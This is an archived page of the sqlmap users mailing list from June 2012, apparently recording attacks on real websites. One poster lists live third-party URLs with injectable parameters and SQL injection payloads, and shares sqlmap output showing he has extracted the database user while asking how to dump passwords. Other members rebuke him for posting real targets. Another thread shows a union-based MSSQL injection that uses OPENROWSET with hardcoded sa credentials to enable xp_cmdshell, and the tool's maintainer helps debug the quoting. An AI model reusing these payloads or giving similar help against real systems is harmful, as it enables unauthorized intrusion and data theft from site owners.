sqlmap-users Mailing List for sqlmap (Page 57)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2012-06-25 15:40:33
|
Hi Bob. James and Iago are right. Please don't use mailing list to post real target URLs. Kind regards, Miroslav Stampar On Mon, Jun 25, 2012 at 2:19 PM, Iago Sousa <146...@gm...> wrote: > Yes, > In some places is illegal the usage of pentest without mutual consent. (Or > is opposite?) > > I advise, read the legal disclaimer in sqlmap's banner. > > And get it as a recommendation. Don't keep posting url vulns in mailing > list, only the traffic file if is required by Miroslav (in private > conversation) (to correct a bug or something like that). > > > On Mon, Jun 25, 2012 at 8:57 AM, James <ja...@ev...> wrote: > >> ** >> Are you serious? >> >> DON'T POST VULNERABLE URLS ON THE MAILING LIST. >> >> This mailing list needs to move to something more censored if people are >> going to be so stupid. >> >> >> On 06/25/2012 04:02 AM, Bob wrote: >> >> http://www.alcosens.com/fsbClient/ezboard.jsp >> injectable parameter is: "searchWord" >> >> www.mobcstyle.com/goods/search.php", using HTTP method GET. The >> injectable parameter is: "search_price_start >> >> >> "http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm"<http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm> >> >> is there anyone can use sqlmap find injected point? >> >> best regards >> Bob >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> >> >> _______________________________________________ >> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Regards, > Iago Sousa > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Iago S. <146...@gm...> - 2012-06-25 12:20:07
|
Yes, In some places is illegal the usage of pentest without mutual consent. (Or is opposite?) I advise, read the legal disclaimer in sqlmap's banner. And get it as a recommendation. Don't keep posting url vulns in mailing list, only the traffic file if is required by Miroslav (in private conversation) (to correct a bug or something like that). On Mon, Jun 25, 2012 at 8:57 AM, James <ja...@ev...> wrote: > ** > Are you serious? > > DON'T POST VULNERABLE URLS ON THE MAILING LIST. > > This mailing list needs to move to something more censored if people are > going to be so stupid. > > > On 06/25/2012 04:02 AM, Bob wrote: > > http://www.alcosens.com/fsbClient/ezboard.jsp > injectable parameter is: "searchWord" > > www.mobcstyle.com/goods/search.php", using HTTP method GET. The > injectable parameter is: "search_price_start > > > "http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm"<http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm> > > is there anyone can use sqlmap find injected point? > > best regards > Bob > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Regards, Iago Sousa |
|
From: James <ja...@ev...> - 2012-06-25 11:57:15
|
Are you serious? DON'T POST VULNERABLE URLS ON THE MAILING LIST. This mailing list needs to move to something more censored if people are going to be so stupid. On 06/25/2012 04:02 AM, Bob wrote: > http://www.alcosens.com/fsbClient/ezboard.jsp > injectable parameter is: "searchWord" > > www.mobcstyle.com/goods/search.php", using HTTP method GET. The > injectable parameter is: "search_price_start > > "http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm" > > > is there anyone can use sqlmap find injected point? > > best regards > Bob > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: B. <sto...@qq...> - 2012-06-25 08:02:19
|
http://www.alcosens.com/fsbClient/ezboard.jsp injectable parameter is: "searchWord" www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable parameter is: "search_price_start "http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm" is there anyone can use sqlmap find injected point? best regards Bob |
|
From: B. <sto...@qq...> - 2012-06-25 07:43:56
|
http://www.alcosens.com/fsbClient/ezboard.jsp injectable parameter is: "searchWord" www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable parameter is: "search_price_start is there anyone can use sqlmap find injected point? best regards Bob |
|
From: James <ja...@ev...> - 2012-06-24 05:03:38
|
I've had sites with poorly configured SQL servers time out. It happens. You should probably try increasing the time out first of all. James On 06/24/2012 12:33 AM, Iago Sousa wrote: > > I think that the site is blocking your ip address. > >> On Jun 23, 2012 11:09 PM, "Bob" <sto...@qq... >> <mailto:sto...@qq...>> wrote: >> >> >> Hi all, >> >> I am use sqlmap to retrieve database >> >> current-user and current-db can workable >> >> retrieve tables ,passwords etc will response time out >> >> Could you tell me what is the problem ? how i can retrieve tables and >> passwords ? >> >> Thanks >> >> bob >> [09:56:07] [INFO] testing connection to the target url >> sqlmap identified the following injection points with a total of 0 >> HTTP(s) requests: >> --- >> Place: GET >> Parameter: c_sn >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl >> --- >> >> [09:56:08] [INFO] testing MySQL >> [09:56:08] [INFO] confirming MySQL >> [09:56:08] [INFO] the back-end DBMS is MySQL >> web server operating system: Linux CentOS 5 >> web application technology: Apache 2.2.3, PHP 5.1.6 >> back-end DBMS: MySQL >= 5.0.0 >> [09:56:08] [INFO] fetching current user >> [09:56:08] [INFO] resumed: keyway_db@localhost >> current user: 'keyway_db@localhost' >> >> [09:56:08] [INFO] fetching database users privileges >> [09:56:08] [INFO] fetching database users >> [09:56:08] [INFO] fetching number of database users >> [09:56:08] [WARNING] running in a single-thread mode. Please consider >> usage of option '--threads' for faster data retrieval >> [09:56:08] [INFO] retrieved: >> [09:57:09] [CRITICAL] connection timed out to the target url or >> proxy, sqlmap is going to retry the request >> [09:58:10] [CRITICAL] connection timed out to the target url or >> proxy, sqlmap is going to retry the request >> [09:59:11] [CRITICAL] connection timed out to the target url or >> proxy, sqlmap is going to retry the request >> [10:00:12] [CRITICAL] connection timed out to the target url or proxy >> >> [*] shutting down at 10:00:12 >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Iago S. <146...@gm...> - 2012-06-24 04:34:05
|
I think that the site is blocking your ip address.
On Jun 23, 2012 11:09 PM, "Bob" <sto...@qq...> wrote:
Hi all,
I am use sqlmap to retrieve database
current-user and current-db can workable
retrieve tables ,passwords etc will response time out
Could you tell me what is the problem ? how i can retrieve tables and
passwords ?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy,
sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy,
sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy,
sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
|
From: B. <sto...@qq...> - 2012-06-24 02:09:08
|
Hi all,
I am use sqlmap to retrieve database
current-user and current-db can workable
retrieve tables ,passwords etc will response time out
Could you tell me what is the problem ? how i can retrieve tables and passwords ?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12 |
|
From: Pedrito P. <0ar...@gm...> - 2012-06-21 16:49:22
|
[11:46:09] [INFO] testing connection to the target url [11:46:13] [WARNING] unknown web page charset 'iso-5589-1'. Please report by e-m ail to sql...@li.... |
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 12:19:21
|
Hi Adi. I think that that is really the proper way how to "escape" the single quote in MsSQL ( http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver) and you can't use any CHAR() escaping directly inside the OPENROWSET (there are some ways how to do it via EXEC http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec<- you can use there a CHAR() escaping, but I really do believe that this is unnecessary in your case). So, I would suggest you to continue playing around a bit (e.g. with other extended stored procedures ( http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the problem persists). Kind regards, Miroslav Stampar On Thu, Jun 21, 2012 at 1:12 PM, Adi Mutu <adi...@ya...> wrote: > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' > select @@version; master..sp_configure ''xp_cmdshell'',1 > ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 > > the problem is with the query: > > select @@version; master..sp_configure ''xp_cmdshell'',1 > Any possibility to give the string from ascii codes as in mysql? > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 2:01 PM > *Subject:* Re: [sqlmap-users] error with ms sql > > It all depends on context. You'll need to send a sample that you want to > run. Quotes are not interpreted/parsed everywhere the same. > > Kind regards > > On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote: > > my feeling is that > "[OLE/DB provider returned message: Deferred prepare could not be > completed." is because of an sql error:) so my fault. > > and regarding the second error, I think you must always return some > columns in the query , such as select @@version. > > now question is how do i embed a string inside another string delimited > with quotes? Looks like double quotes is not working.....doubling quote '' > looks like not working always.... > > ------------------------------ > *From:* Adi Mutu <adi...@ya...> > *To:* Miroslav Stampar <mir...@gm...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:45 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > tried, same stuff. > I've tried to reenable xp_cmdshell first with > > master..sp_configure 'show advanced options',1 > reconfigure > master..sp_configure 'xp_cmdshell',1 > reconfigure > > and got the same error: [OLE/DB provider returned message: Deferred > prepare could not be completed.] > > then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' > and got error: > > OLE DB error trace [Non-interface error: OLE DB provider unable to process > object, since the object has no columnsProviderName='SQLOLEDB', Query=exec > sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. > > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:26 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > try with master..resultabcd > > i forgot to mention that there needs to be two dots (or schema name in > between) between db name and table name in mssql > > On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: > > Hi Miroslav, > > got db_name master and tried with master.resultabcd but i get the same > error. > > Kind Regards, > A. > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:11 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > > I'm having an injection like this: > openrowset in a union (I've managed to do a SELECT @@version on > 192.168.1.4) > > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select > output from resultbcd')),'aaa','15','16','17','18','19','20','21' from > teachers7 where id=808 > > and when I try to select form resultabcd i get: > [OLE/DB provider returned message: Deferred prepare could not be > completed.] > > could not find a good answer with google. Thanks. > > Kind regards, > A. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Adi M. <adi...@ya...> - 2012-06-21 11:12:17
|
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' select @@version; master..sp_configure ''xp_cmdshell'',1 ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
the problem is with the query:
select @@version; master..sp_configure ''xp_cmdshell'',1
Any possibility to give the string from ascii codes as in mysql?
________________________________
From: Miroslav Stampar <mir...@gm...>
To: Adi Mutu <adi...@ya...>
Cc: "sql...@li..." <sql...@li...>
Sent: Thursday, June 21, 2012 2:01 PM
Subject: Re: [sqlmap-users] error with ms sql
It all depends on context. You'll need to send a sample that you want to run. Quotes are not interpreted/parsed everywhere the same.
Kind regards
On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote:
my feeling is that
>"[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an sql error:) so my fault.
>
>
>
>and regarding the second error, I think you must always return some columns in the query , such as select @@version.
>
>
>now question is how do i embed a string inside another string delimited with quotes? Looks like double quotes is not working.....doubling quote '' looks like not working always....
>
>
>
>________________________________
> From: Adi Mutu <adi...@ya...>
>To: Miroslav Stampar <mir...@gm...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:45 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>tried, same stuff.
>I've tried to reenable xp_cmdshell first with
>
>
>master..sp_configure 'show advanced options',1
>reconfigure
>master..sp_configure 'xp_cmdshell',1
>reconfigure
>
>
>and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.]
>
>
>then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
>and got error:
>
>
>OLE DB error trace [Non-interface error:
OLE DB provider unable to process object, since the object has no
columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc
"xp_cmdshell","xp_log70.dll" '].
>
>
>
>
>
>
>________________________________
> From: Miroslav Stampar <mir...@gm...>
>To: Adi Mutu <adi...@ya...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:26 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>try with master..resultabcd
>
>
>i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql
>
>
>On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote:
>
>Hi Miroslav,
>>
>>
>>got db_name master and tried with master.resultabcd but i get the same error.
>>
>>
>>Kind Regards,
>>A.
>>
>>
>>
>>________________________________
>> From: Miroslav Stampar <mir...@gm...>
>>To: Adi Mutu <adi...@ya...>
>>Cc: "sql...@li..." <sql...@li...>
>>Sent: Thursday, June 21, 2012 11:11 AM
>>Subject: Re: [sqlmap-users] error with ms sql
>>
>>
>>
>>Hi Adi.
>>
>>
>>You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)
>>
>>
>>Kind regards,
>>Miroslav Stampar
>>
>>
>>On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote:
>>
>>I'm having an injection like this:
>>>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>>>
>>>
>>>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>>>
>>>
>>>
>>>and when I try to select form resultabcd i get:
>>>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>>>
>>>
>>>
>>>could not find a good answer with google. Thanks.
>>>
>>>
>>>Kind regards,
>>>A.
>>>------------------------------------------------------------------------------
>>>Live Security Virtual Conference
>>>Exclusive live event will cover all the ways today's security and
>>>threat landscape has changed and how IT managers can respond. Discussions
>>>will include endpoint security, mobile security and the latest in malware
>>>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>_______________________________________________
>>>sqlmap-users mailing list
>>>sql...@li...
>>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>>--
>>Miroslav Stampar
>>http://about.me/stamparm
>>
>>
>>
>
>
>
>--
>Miroslav Stampar
>http://about.me/stamparm
>
>
>
>------------------------------------------------------------------------------
>Live Security Virtual Conference
>Exclusive live event will cover all the ways today's security and
>threat landscape has changed and how IT managers can respond. Discussions
>will include endpoint security, mobile security and the latest in malware
>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>_______________________________________________
>sqlmap-users mailing list
>sql...@li...
>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
--
Miroslav Stampar
http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 11:01:39
|
It all depends on context. You'll need to send a sample that you want to run. Quotes are not interpreted/parsed everywhere the same. Kind regards On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote: > my feeling is that > "[OLE/DB provider returned message: Deferred prepare could not be > completed." is because of an sql error:) so my fault. > > and regarding the second error, I think you must always return some > columns in the query , such as select @@version. > > now question is how do i embed a string inside another string delimited > with quotes? Looks like double quotes is not working.....doubling quote '' > looks like not working always.... > > ------------------------------ > *From:* Adi Mutu <adi...@ya...> > *To:* Miroslav Stampar <mir...@gm...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:45 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > tried, same stuff. > I've tried to reenable xp_cmdshell first with > > master..sp_configure 'show advanced options',1 > reconfigure > master..sp_configure 'xp_cmdshell',1 > reconfigure > > and got the same error: [OLE/DB provider returned message: Deferred > prepare could not be completed.] > > then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' > and got error: > > OLE DB error trace [Non-interface error: OLE DB provider unable to process > object, since the object has no columnsProviderName='SQLOLEDB', Query=exec > sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. > > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:26 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > try with master..resultabcd > > i forgot to mention that there needs to be two dots (or schema name in > between) between db name and table name in mssql > > On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: > > Hi Miroslav, > > got db_name master and tried with master.resultabcd but i get the same > error. > > Kind Regards, > A. > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:11 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > > I'm having an injection like this: > openrowset in a union (I've managed to do a SELECT @@version on > 192.168.1.4) > > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select > output from resultbcd')),'aaa','15','16','17','18','19','20','21' from > teachers7 where id=808 > > and when I try to select form resultabcd i get: > [OLE/DB provider returned message: Deferred prepare could not be > completed.] > > could not find a good answer with google. Thanks. > > Kind regards, > A. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Adi M. <adi...@ya...> - 2012-06-21 10:57:36
|
